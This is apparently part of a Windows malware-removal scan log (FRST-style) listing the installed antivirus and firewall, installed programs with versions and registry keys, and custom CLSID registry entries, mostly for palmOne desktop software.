AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
FW: McAfee Firewall (Disabled) {94894B63-8C7F-4050-BDA4-813CA00DA3E8}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat  9 Standard (HKLM\...\{AC76BA86-1033-0000-BA7E-000000000004}{AC76BA86-1033-0000-BA7E-000000000004}) (Version: 9.5.5 - Adobe Systems)
Adobe Acrobat 9.5.5 - CPSID_83708 (HKLM\...\{AC76BA86-1033-0000-BA7E-000000000004}_955) (Version:  - Adobe Systems Incorporated)
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.8.800.94 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.03) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.03 - Adobe Systems Incorporated)
CCleaner (HKLM\...\CCleaner) (Version: 5.03 - Piriform)
Defraggler (HKLM\...\Defraggler) (Version: 2.18 - Piriform)
Dell Laser MFP 1600n Software Uninstall (HKLM\...\Dell Laser MFP 1600n) (Version:  - )
Exaktime TimeSummit (HKLM\...\{B97762AA-8AE5-40CE-9AA3-ABC3764C19A4}) (Version: 3.8.1.26 - Exaktime, Inc.)
Google Chrome (HKLM\...\Google Chrome) (Version: 41.0.2272.76 - Google Inc.)
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.26.9 - Google Inc.) Hidden
HP LaserJet Professional M1530 MFP Series (HKLM\...\{74280B5D-A0AF-46c5-9C85-D9EA078262F1}) (Version:  - Hewlett-Packard)
HP LJ M1530 MFP Series HP Scan (HKLM\...\{C05002F1-06F8-4A15-B6F8-E4DC655C28AA}) (Version: 1.0.302.0 - Hewlett-Packard Co.)
HP Photo Printing Software (HKLM\...\HP Photo Printing Software) (Version:  - )
hp psc 900 series (HKLM\...\hp psc 900 series 1408981082) (Version:  - )
HP Share-to-Web (HKLM\...\{748F4870-8350-11D3-B0BF-080009FB4A19}) (Version:  - )
HP Update (HKLM\...\{B0069CFA-5BB9-4C03-B1C6-89CE290E5AFE}) (Version: 5.002.006.003 - Hewlett-Packard)
HPLaserJetHelp_LearnCenter (HKLM\...\{B2AA0F22-E167-4C4A-BAE2-E0025028E61B}) (Version: 1.02.0000 - Hewlett-Packard)
HPLJUT (Version: 1.00.0012 - HP) Hidden
hppFaxDrvM1530 (Version: 003.000.00001 - Hewlett-Packard) Hidden
hppFaxUtilityM1530 (Version: 000.002.00001 - Hewlett-Packard) Hidden
hppLaserJetService (Version: 002.015.00599 - Hewlett-Packard) Hidden
hppM1530LaserJetService (Version: 001.008.00477 - Hewlett-Packard) Hidden
hppSendFaxM1530 (Version: 003.000.00001 - Hewlett-Packard) Hidden
hppTLBXFXM1530 (Version: 001.012.00948 - Hewlett-Packard) Hidden
hpzTLBXFX (Version: 006.015.01163 - Hewlett-Packard) Hidden
I.R.I.S. OCR (HKLM\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
imagePROGRAF Device Setup Utility (HKLM\...\{B3BDF1F4-0312-4307-811B-DE5E452A7AE6}) (Version: 4.60 - )
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - )
Intel® PRO Network Connections Drivers (HKLM\...\PROSet) (Version:  - )
iolo technologies' System Mechanic Professional (HKLM\...\{BBD3F66B-1180-4785-B679-3F91572CD3B4}_is1) (Version: 14.5.0 - iolo technologies, LLC)
iPF600 Printer Driver Extra Kit (HKLM\...\{44B56E9E-5B88-4E90-97BD-D95D35932D06}) (Version: 1.92.11 - )
Logitech Alert Commander (HKLM\...\{635E34BC-AF78-43A9-B72D-1B6E94CA8125}) (Version: 3.0.234 - Logitech)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 2.0 Service Pack 2 Language Pack - DEU (HKLM\...\{C314CE45-3392-3B73-B4E1-139CD41CA933}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 2.0 Service Pack 2 Language Pack - FRA (HKLM\...\{72AD53CC-CCC0-3757-8480-9EE176866A7C}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 3.0.40818.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{BD68F46D-8A82-4664-8E68-F87C55BDEFD4}) (Version: 9.00.4035.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.4035.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{56B4002F-671C-49F4-984C-C760FE3806B5}) (Version: 9.00.4035.00 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Word 2002 (HKLM\...\{911B0409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.2627.01 - Microsoft Corporation)
Microsoft Works 2002 Setup Launcher (HKLM\...\Works2002Setup) (Version:  - )
Microsoft Works 6.0 (HKLM\...\{A1B7B9B3-E1D2-41CA-9B4A-F18DC2710704}) (Version: 06.00.0000 - Microsoft Corporation)
Microsoft Works Suite Add-in for Microsoft Word (HKLM\...\{C3A439E4-7303-491F-A678-CEA36A87D517}) (Version: 2.0.0.0000 - Microsoft Corporation)
MSN Toolbar Platform (Version: 4.0.0357.1 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 6.0 Parser (HKLM\...\{A43BF6A5-D5F0-4AAA-BF41-65995063EC44}) (Version: 6.10.1129.0 - Microsoft Corporation)
palmOne (HKLM\...\{FF8157AA-F640-45BD-B7C2-BAA1016B267A}) (Version: 4.1.0420 - palmOne, Inc.)
Quantum Project Manager (HKLM\...\Quantum Project Manager) (Version: 5.0c - Quantum Software Solutions, Inc.)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 5.10.0.5548 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.51 - Piriform)
Shared C Run-time for x86 (Version: 10.0.0 - McAfee) Hidden
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
System Mechanic 12 Professional (Version: 14.5.0 - ) Hidden
Total Access Memo 2000 (HKLM\...\Total Access Memo 2000) (Version:  - )
WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
Windows Genuine Advantage Notifications (KB905474) (HKLM\...\WgaNotify) (Version: 1.9.0040.0 - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\KB892130) (Version:  - Microsoft Corporation)
Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140743 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Management Framework Core (HKLM\...\KB968930) (Version:  - Microsoft Corporation)
Works Suite OS Pack (Version: 1.0.0.0000 - Microsoft Corporation) Hidden
Works Synchronization (Version: 1.0.0.0000 - Your Company Name) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{0DA49AC1-FBD9-4F26-89C4-42074DE9F500}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{12630C47-7373-4463-8C38-EF1F45D08BB8}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{149EE4A0-EE69-11D2-AC32-006008E3F0A2}\InprocServer32 -> C:\Program Files\palmOne\ComConduit.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{149EE4A0-EE69-11D2-AC32-006008E3F0A2}\localserver32 -> C:\Program Files\palmOne\ComConduit.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{149EE4A1-EE69-11D2-AC32-006008E3F0A2}\InprocServer32 -> C:\Program Files\palmOne\ComConduit.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{149EE4A1-EE69-11D2-AC32-006008E3F0A2}\localserver32 -> C:\Program Files\palmOne\ComConduit.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{164A4365-064D-494D-92C8-9303A5080157}\InprocServer32 -> C:\Program Files\palmOne\SgCalendar.ocx (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{188047CE-0F0A-11D7-8331-00C04FA03755}\localserver32 -> C:\Program Files\palmOne\QuickInstall.exe (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{1C43DF3D-E1C6-473E-9627-D7638EF63690}\InprocServer32 -> C:\Program Files\palmOne\DmConduit.dll (PalmSource Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{1D67C047-F016-11D6-831E-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\PictPreview.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{1E8640C7-545F-4E6A-83F4-D92706C99E00}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{1FFD7892-06E4-4A0A-941E-BC966900C883}\InprocServer32 -> C:\Program Files\palmOne\PhotoDesktop\Media.ocx (palmOne, Inc. developed by ArcSoft, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{209DAEB8-0F02-11D7-8331-00C04FA03755}\localserver32 -> C:\Program Files\palmOne\QuickInstall.exe (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{28B8F788-271C-4618-9F55-4B1B40E6DF16}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{28DC33AE-D0A8-40A7-A9EA-5F6598207496}\InprocServer32 -> C:\Program Files\palmOne\ComDirect.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{2CE29E35-35AA-455F-894F-F70BE74DB639}\InprocServer32 -> C:\Program Files\palmOne\PSDConduit.dll (PalmSource, Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{2E0C66AC-5A87-4AFF-AC9F-93B33D43E4ED}\InprocServer32 -> C:\Program Files\palmOne\SgDateAlarm.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{3193996D-1AC8-11D4-80CC-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\AlarmSvr.dll (Palm, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{3597288E-FF31-49C2-A58A-EA88F3CEDD42}\InprocServer32 -> C:\Program Files\palmOne\SgCalendar.ocx (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{3B33746E-C60D-4213-9438-B36424338150}\InprocServer32 -> C:\Program Files\palmOne\ComDirect.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{3B52D512-935F-11D6-82D4-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\PRouter.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{3CF39B9A-0CF8-4792-A918-67573260BDBE}\InprocServer32 -> C:\Program Files\palmOne\PhotoDesktop\Media.ocx (palmOne, Inc. developed by ArcSoft, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{4054F903-7C40-43D0-8ACE-3F5D73A9890C}\InprocServer32 -> C:\Program Files\palmOne\PSDConduit.dll (PalmSource, Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{43F73EA1-92AE-11D6-82D3-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\PRouter.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{496038FA-3891-4827-AFCD-A7B13B9FF75A}\InprocServer32 -> C:\Program Files\palmOne\PhotoDesktop\PhotosPlugIn.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{49EB4C90-AE3D-4846-A719-F775FFEE600A}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{57B98049-D96F-471B-942B-6B05CB2CFE0A}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{5AA15E20-EE68-11D2-AC32-006008E3F0A2}\InprocServer32 -> C:\Program Files\palmOne\ComConduit.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{61B7A221-D11F-4702-B5C0-79C492A726B9}\InprocServer32 -> C:\Program Files\palmOne\PSDConduit.dll (PalmSource, Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{6357BCA7-B06E-11D6-82EF-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\DefaultPlugin.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{6357BCB6-B06E-11D6-82EF-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\PqiIcon.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{6357BCB9-B06E-11D6-82EF-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\PqiIcon.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{6357BCBC-B06E-11D6-82EF-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\PqiIcon.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{6357BCBE-B06E-11D6-82EF-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\PqiIcon.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{6600B26A-CCCE-4EF9-870E-DAB97E489CDF}\InprocServer32 -> C:\Program Files\palmOne\SgDateAlarm.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{660AF3D0-0EC6-4285-8447-B286B724687B}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{6DFD9121-8D67-418B-88A0-81C385138EFB}\InprocServer32 -> C:\Documents and Settings\All Users\Application Data\{72CDD0F3-C5DC-44BD-9A3E-9B7A11C6D8F9}\cmcfg32.dll (America Online)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{75C8163F-59DF-4C9D-BC00-D0419B2CED5B}\InprocServer32 -> C:\Program Files\palmOne\PSDConduit.dll (PalmSource, Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{763F9014-A89C-11D6-82E7-00C04FA03755}\localserver32 -> C:\Program Files\palmOne\QuickInstall.exe (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{7686FC59-EA6F-11D5-823E-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\InstServ.dll (Palm, Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{78547CB6-2D08-47F4-A1EB-AF576A33E433}\InprocServer32 -> C:\Program Files\palmOne\SgContacts.ocx (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{7D11ED93-A77D-41FA-8EA5-5B39BC29E7F9}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{7DEBC7E0-FA1F-11D2-AC32-006008E3F0A2}\InprocServer32 -> C:\Program Files\palmOne\ComDirect.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{7DEBC7E4-FA1F-11D2-AC32-006008E3F0A2}\InprocServer32 -> C:\Program Files\palmOne\ComDirect.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{7DEBC7E6-FA1F-11D2-AC32-006008E3F0A2}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{7DEBC7E7-FA1F-11D2-AC32-006008E3F0A2}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{7DEBC7E9-FA1F-11D2-AC32-006008E3F0A2}\InprocServer32 -> C:\Program Files\palmOne\ComDirect.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{80C297AB-A0CB-4CE4-A5F1-36EB810BE047}\InprocServer32 -> C:\Program Files\palmOne\ComDirect.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{831B49E8-91A6-11D5-820F-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\ExpenseExt.ocx (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{831B49E9-91A6-11D5-820F-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\ExpenseExt.ocx (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{868C6D64-8B98-11D5-8209-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\NotePadExt.ocx (Palm, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{868C6D65-8B98-11D5-8209-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\NotePadExt.ocx (Palm, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{87001487-8B8A-4C40-BFEF-036F5BD5BAA3}\InprocServer32 -> C:\Program Files\palmOne\PhotoDesktop\PhotosPlugIn.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{887A7C26-B4AF-4F22-BE5E-20C00D340C74}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{92DA540D-FCC0-442C-8F82-7F6C1DBD66C8}\InprocServer32 -> C:\Program Files\palmOne\SgMemos.ocx (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{A0C20550-9476-407C-BFB0-3C84C2639AE6}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{A13FAF1A-6069-40A4-AD5F-110EFA282490}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{A1EED615-F007-4D40-9C06-A3CCD3CB68E1}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{A4C43001-108F-48E8-B2FF-F174977EDF03}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{A50DA40C-59F7-40A6-B2D1-748493584E9C}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{A545EB9B-B12D-4BA6-8110-1D61A3566A93}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{A61F01A5-CD25-4780-A3B9-041172CD6450}\InprocServer32 -> C:\Program Files\palmOne\PSDConduit.dll (PalmSource, Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{AB40E4E0-0F0C-11D7-8331-00C04FA03755}\localserver32 -> C:\Program Files\palmOne\QuickInstall.exe (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{AD74B184-E73A-4565-A38C-1329A29C7260}\InprocServer32 -> C:\Program Files\palmOne\PSDConduit.dll (PalmSource, Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{AF04C884-2C5F-430F-97ED-6E127F47046C}\InprocServer32 -> C:\Program Files\palmOne\DmConduit.dll (PalmSource Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{AF478991-F6B0-40E8-856B-E80BE0677AFC}\InprocServer32 -> C:\Program Files\palmOne\SgTasks.ocx (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{B2565128-0F22-11D7-8331-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\PRouter.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{B2F7AF3C-0CA7-4EAE-BBBF-A748FBC500DD}\InprocServer32 -> C:\Program Files\palmOne\SgMemos.ocx (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{B416D295-53BA-4E16-8D54-B80281643A8A}\InprocServer32 -> C:\Program Files\palmOne\ComDirect.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{B53B7736-61FA-4EF3-8989-B83C80979D89}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{B9BF9DA9-1746-4C14-B53C-1826F81EAE0B}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{BD73860F-5142-44C9-B7C4-26CD2AB55477}\InprocServer32 -> C:\Program Files\palmOne\ComDirect.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{BE1B5231-A3E2-11D6-82E3-00C04FA03755}\localserver32 -> C:\Program Files\palmOne\QuickInstall.exe (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{BE1B5233-A3E2-11D6-82E3-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\PRouter.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{BE1B5235-A3E2-11D6-82E3-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\PRouter.dll (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{BE44897A-EB38-11D5-823F-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\RegServ.dll ()
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{C0010C26-F44B-4BE2-9D65-04D3934C5E46}\InprocServer32 -> C:\Program Files\palmOne\SgTasks.ocx (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{C11BCF07-4F91-4748-956E-2B4FFC9401C5}\InprocServer32 -> C:\Program Files\palmOne\SgContacts.ocx (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{C2775C61-2C1C-4D50-A5E6-4814620116CD}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{C3DB9DF7-64EC-46EC-86C4-27668ABA9777}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{D75FA101-6942-47DF-88DF-353F30D35682}\InprocServer32 -> C:\Program Files\palmOne\PSDConduit.dll (PalmSource, Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{D79AC66C-BDB2-4028-B79A-F1465F8FBB56}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{DCDA65F9-134B-4333-BCA0-809306CB2F55}\InprocServer32 -> C:\Program Files\palmOne\DmConduit.dll (PalmSource Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{DD7731C5-1E16-4087-A57F-FEDCFBD8EB2B}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{DEF0B543-775C-4963-A116-DF304EE2C4DA}\InprocServer32 -> C:\Program Files\palmOne\DmConduit.dll (PalmSource Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{DFD4C164-AE18-11D6-82EC-00C04FA03755}\localserver32 -> C:\Program Files\palmOne\QuickInstall.exe (palmOne, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{E5A0FEE6-087B-4E48-BE06-5E1A1EF5E116}\InprocServer32 -> C:\Program Files\palmOne\ComStandard.dll (PalmSource, Inc.)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{E851CFC8-5724-406D-9B36-11A44E72EA11}\InprocServer32 -> C:\Program Files\palmOne\PSDConduit.dll (PalmSource, Inc)
